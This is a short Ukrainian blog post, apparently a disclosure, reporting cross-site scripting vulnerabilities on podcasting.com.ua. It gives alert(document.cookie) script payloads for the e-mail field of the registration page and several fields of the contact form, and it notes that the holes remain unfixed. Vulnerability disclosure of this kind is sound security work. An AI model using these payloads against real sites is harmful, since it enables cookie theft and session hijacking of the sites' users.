Уразливості на podcasting.com.ua

19:42 11.10.2007

21.05.2007

У січні, 04.01.2007, я знайшов чимало Cross-Site Scripting уразливостей на проекті http://podcasting.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

11.10.2007

XSS:

POST запит на сторінці http://podcasting.com.ua/wp-register.php:

"><script>alert(document.cookie)</script>В полі: E-Mail.

XSS:

POST запит на сторінці http://podcasting.com.ua/kontakt/:

"><script>alert(document.cookie)</script>В полях: Ваше имя, E-mail, Ваш веб-сайт.

</textarea><script>alert(document.cookie)</script>В полі: Сообщение.

Дані уразливості досі не виправлені.


Leave a Reply

You must be logged in to post a comment.